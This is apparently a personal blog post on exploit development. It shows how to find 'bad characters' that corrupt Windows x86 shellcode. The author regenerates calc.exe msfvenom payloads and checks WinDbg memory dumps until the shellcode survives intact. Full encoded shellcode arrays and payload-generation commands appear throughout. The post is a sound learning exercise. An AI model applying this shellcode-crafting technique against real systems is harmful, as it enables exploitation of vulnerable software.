One of the things I learned here is that "bad characters" can have a significant impact on the success of your shellcode.
As a result for this post, I'm expanding my knowledge about bad character analysis.
At this point I'm looking to execute "calc.exe". So first up, run msfvenom without any bad characters command line option.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 | root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) x86/shikata_ga_nai chosen with final size 220 Payload size: 220 bytes Final size of c file: 949 bytes unsigned char buf[] = "\xd9\xc1\xd9\x74\x24\xf4\xbf\x89\xfa\x6f\xea\x5b\x33\xc9\xb1" "\x31\x31\x7b\x18\x03\x7b\x18\x83\xc3\x8d\x18\x9a\x16\x65\x5e" "\x65\xe7\x75\x3f\xef\x02\x44\x7f\x8b\x47\xf6\x4f\xdf\x0a\xfa" "\x24\x8d\xbe\x89\x49\x1a\xb0\x3a\xe7\x7c\xff\xbb\x54\xbc\x9e" "\x3f\xa7\x91\x40\x7e\x68\xe4\x81\x47\x95\x05\xd3\x10\xd1\xb8" "\xc4\x15\xaf\x00\x6e\x65\x21\x01\x93\x3d\x40\x20\x02\x36\x1b" "\xe2\xa4\x9b\x17\xab\xbe\xf8\x12\x65\x34\xca\xe9\x74\x9c\x03" "\x11\xda\xe1\xac\xe0\x22\x25\x0a\x1b\x51\x5f\x69\xa6\x62\xa4" "\x10\x7c\xe6\x3f\xb2\xf7\x50\xe4\x43\xdb\x07\x6f\x4f\x90\x4c" "\x37\x53\x27\x80\x43\x6f\xac\x27\x84\xe6\xf6\x03\x00\xa3\xad" "\x2a\x11\x09\x03\x52\x41\xf2\xfc\xf6\x09\x1e\xe8\x8a\x53\x74" "\xef\x19\xee\x3a\xef\x21\xf1\x6a\x98\x10\x7a\xe5\xdf\xac\xa9" "\x42\x2f\xe7\xf0\xe2\xb8\xae\x60\xb7\xa4\x50\x5f\xfb\xd0\xd2" "\x6a\x83\x26\xca\x1e\x86\x63\x4c\xf2\xfa\xfc\x39\xf4\xa9\xfd" "\x6b\x97\x2c\x6e\xf7\x76\xcb\x16\x92\x86" |
Looking at this in memory we see:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | 0:000> d 0012fd64 l dc 0012fd64 cc cc cc cc 10 01 b1 f1-90 90 90 90 90 d9 c1 d9 ................ 0012fd74 74 24 f4 bf 89 fa 6f ea-5b 33 c9 b1 31 31 7b 18 t$....o.[3..11{. 0012fd84 03 7b 18 83 c3 8d 18 9a-16 65 5e 65 e7 75 3f ef .{.......e^e.u?. 0012fd94 02 44 7f 8b 47 f6 4f df-3c 07 00 00 ec fd 12 00 .D..G.O.<....... 0012fda4 52 89 49 00 74 c4 4a 00-88 fd 12 00 08 00 00 00 R.I.t.J......... 0012fdb4 00 00 aa 00 ec fd 12 00-02 00 00 00 00 00 00 00 ................ 0012fdc4 00 00 00 00 00 00 00 00-5d ae 49 00 4c fe 12 00 ........].I.L... 0012fdd4 24 0a aa 00 00 00 00 00-00 00 00 00 00 00 00 00 $............... 0012fde4 4c fe 12 00 ba ca 48 00-c1 ca 48 00 dc 93 4a 00 L.....H...H...J. 0012fdf4 02 00 00 00 d0 fe 12 00-00 00 00 00 20 fe 12 00 ............ ... 0012fe04 82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00 ..H............. 0012fe14 20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00 ...........q.A. 0012fe24 48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00 H.....I.....x(.. 0012fe34 00 00 00 00 00 00 00 00-00 00 00 00 ............ |
From above we can already see "00"s. This is already a no no. Additionally we see that while '\x0a' can be found in the 3rd row of the raw shellcode in the script but it is not in the memory dump output. At this point we have two bad characters "\x00" and "\x0a"
Running msfvenom with the bad characters option, we get below:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a' Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) x86/shikata_ga_nai chosen with final size 220 Payload size: 220 bytes Final size of c file: 949 bytes unsigned char buf[] = "\xba\xb3\x4e\x5e\xa8\xdb\xdd\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x31\x31\x50\x13\x83\xe8\xfc\x03\x50\xbc\xac\xab\x54\x2a\xb2" "\x54\xa5\xaa\xd3\xdd\x40\x9b\xd3\xba\x01\x8b\xe3\xc9\x44\x27" "\x8f\x9c\x7c\xbc\xfd\x08\x72\x75\x4b\x6f\xbd\x86\xe0\x53\xdc" "\x04\xfb\x87\x3e\x35\x34\xda\x3f\x72\x29\x17\x6d\x2b\x25\x8a" "\x82\x58\x73\x17\x28\x12\x95\x1f\xcd\xe2\x94\x0e\x40\x79\xcf" "\x90\x62\xae\x7b\x99\x7c\xb3\x46\x53\xf6\x07\x3c\x62\xde\x56" "\xbd\xc9\x1f\x57\x4c\x13\x67\x5f\xaf\x66\x91\x9c\x52\x71\x66" "\xdf\x88\xf4\x7d\x47\x5a\xae\x59\x76\x8f\x29\x29\x74\x64\x3d" "\x75\x98\x7b\x92\x0d\xa4\xf0\x15\xc2\x2d\x42\x32\xc6\x76\x10" "\x5b\x5f\xd2\xf7\x64\xbf\xbd\xa8\xc0\xcb\x53\xbc\x78\x96\x39" "\x43\x0e\xac\x0f\x43\x10\xaf\x3f\x2c\x21\x24\xd0\x2b\xbe\xef" "\x95\xc4\xf4\xb2\xbf\x4c\x51\x27\x82\x10\x62\x9d\xc0\x2c\xe1" "\x14\xb8\xca\xf9\x5c\xbd\x97\xbd\x8d\xcf\x88\x2b\xb2\x7c\xa8" "\x79\xd1\xe3\x3a\xe1\x38\x86\xba\x80\x44"; |
Looking at the dump in memory again:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 | 0:000> d 0012fd64 l dc 0012fd64 cc cc cc cc 10 01 b1 f1-90 90 90 90 90 ba b3 4e ...............N 0012fd74 5e a8 db dd d9 74 24 f4-58 2b c9 b1 31 31 50 13 ^....t$.X+..11P. 0012fd84 83 e8 fc 03 50 bc ac ab-54 2a b2 54 a5 aa d3 dd ....P...T*.T.... 0012fd94 40 9b d3 ba 01 8b e3 c9-44 27 8f 9c 7c bc fd 08 @.......D'..|... 0012fda4 72 75 4b 6f bd 86 e0 53-dc 04 fb 87 3e 35 34 da ruKo...S....>54. 0012fdb4 3f 72 29 17 6d 2b 25 8a-82 58 73 17 28 12 95 1f ?r).m+%..Xs.(... 0012fdc4 cd e2 94 0e 40 79 cf 90-62 ae 7b 99 7c b3 46 53 ....@y..b.{.|.FS 0012fdd4 f6 07 3c 62 de 56 bd c9-1f 57 4c 13 67 5f af 66 ..<b.V...WL.g_.f 0012fde4 91 9c 52 71 66 df 88 f4-7d 47 5a ae 59 76 8f 29 ..Rqf...}GZ.Yv.) 0012fdf4 29 74 64 3d 75 98 7b 92-00 00 00 00 20 fe 12 00 )td=u.{..... ... 0012fe04 82 cd 48 00 00 00 00 00-00 00 00 00 00 00 00 00 ..H............. 0012fe14 20 d6 aa 00 80 ec aa 00-c8 fe 12 00 71 fb 41 00 ...........q.A. 0012fe24 48 c1 aa 00 08 d4 49 00-08 1f 14 00 78 28 a8 00 H.....I.....x(.. 0012fe34 00 00 00 00 00 00 00 00-00 00 00 00 ............ |
At this point we don't see the "\x0d" which is in line 6 of the original shellcode in the memory dump. Time to regenerate the shellcode. This time we have "\x00", "\x0a" and "\x0d" as bad characters.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | root@kali:~# msfvenom --platform Windows --arch x86 --payload windows/exec CMD="calc.exe" --smallest --encoder x86/shikata_ga_nai --format c --iterations 1 --bad-chars '\x00\x0a\x0d' Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 220 (iteration=0) x86/shikata_ga_nai chosen with final size 220 Payload size: 220 bytes Final size of c file: 949 bytes unsigned char buf[] = "\xdb\xd6\xbd\x45\xe1\xbe\xfa\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x31\x83\xe8\xfc\x31\x68\x14\x03\x68\x51\x03\x4b\x06\xb1\x41" "\xb4\xf7\x41\x26\x3c\x12\x70\x66\x5a\x56\x22\x56\x28\x3a\xce" "\x1d\x7c\xaf\x45\x53\xa9\xc0\xee\xde\x8f\xef\xef\x73\xf3\x6e" "\x73\x8e\x20\x51\x4a\x41\x35\x90\x8b\xbc\xb4\xc0\x44\xca\x6b" "\xf5\xe1\x86\xb7\x7e\xb9\x07\xb0\x63\x09\x29\x91\x35\x02\x70" "\x31\xb7\xc7\x08\x78\xaf\x04\x34\x32\x44\xfe\xc2\xc5\x8c\xcf" "\x2b\x69\xf1\xe0\xd9\x73\x35\xc6\x01\x06\x4f\x35\xbf\x11\x94" "\x44\x1b\x97\x0f\xee\xe8\x0f\xf4\x0f\x3c\xc9\x7f\x03\x89\x9d" "\xd8\x07\x0c\x71\x53\x33\x85\x74\xb4\xb2\xdd\x52\x10\x9f\x86" "\xfb\x01\x45\x68\x03\x51\x26\xd5\xa1\x19\xca\x02\xd8\x43\x80" "\xd5\x6e\xfe\xe6\xd6\x70\x01\x56\xbf\x41\x8a\x39\xb8\x5d\x59" "\x7e\x36\x14\xc0\xd6\xdf\xf1\x90\x6b\x82\x01\x4f\xaf\xbb\x81" "\x7a\x4f\x38\x99\x0e\x4a\x04\x1d\xe2\x26\x15\xc8\x04\x95\x16" "\xd9\x66\x78\x85\x81\x46\x1f\x2d\x23\x97" |
Looking at the memory dump:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | 0:000> d 0012fd64 l ef 0012fd64 cc cc cc cc 10 01 b1 f1-90 90 90 90 90 db d6 bd ................ 0012fd74 45 e1 be fa d9 74 24 f4-58 2b c9 b1 31 83 e8 fc E....t$.X+..1... 0012fd84 31 68 14 03 68 51 03 4b-06 b1 41 b4 f7 41 26 3c 1h..hQ.K..A..A&< 0012fd94 12 70 66 5a 56 22 56 28-3a ce 1d 7c af 45 53 a9 .pfZV"V(:..|.ES. 0012fda4 c0 ee de 8f ef ef 73 f3-6e 73 8e 20 51 4a 41 35 ......s.ns. QJA5 0012fdb4 90 8b bc b4 c0 44 ca 6b-f5 e1 86 b7 7e b9 07 b0 .....D.k....~... 0012fdc4 63 20 29 91 35 02 70 31-b7 c7 08 78 af 04 34 32 c ).5.p1...x..42 0012fdd4 44 fe c2 c5 8c cf 2b 69-f1 e0 d9 73 35 c6 01 06 D.....+i...s5... 0012fde4 4f 35 bf 11 94 44 1b 97-0f ee e8 0f f4 0f 3c c9 O5...D........<. 0012fdf4 7f 03 89 9d d8 07 0c 71-53 33 85 74 b4 b2 dd 52 .......qS3.t...R 0012fe04 10 9f 86 fb 01 45 68 03-51 26 d5 a1 19 ca 02 d8 .....Eh.Q&...... 0012fe14 43 80 d5 6e fe e6 d6 70-01 56 bf 41 8a 39 b8 5d C..n...p.V.A.9.] 0012fe24 59 7e 36 14 c0 d6 df f1-90 6b 82 01 4f af bb 81 Y~6......k..O... 0012fe34 7a 4f 38 99 0e 4a 04 1d-e2 26 15 c8 04 95 16 d9 zO8..J...&...... 0012fe44 66 78 85 81 46 1f 2d 23-97 90 90 90 90 90 90 fx..F.-#....... |
At this point it looks like we have a clean shellcode.
References:
http://www.primalsecurity.net/0x7-exploit-tutorial-bad-character-analysis/
No comments:
Post a Comment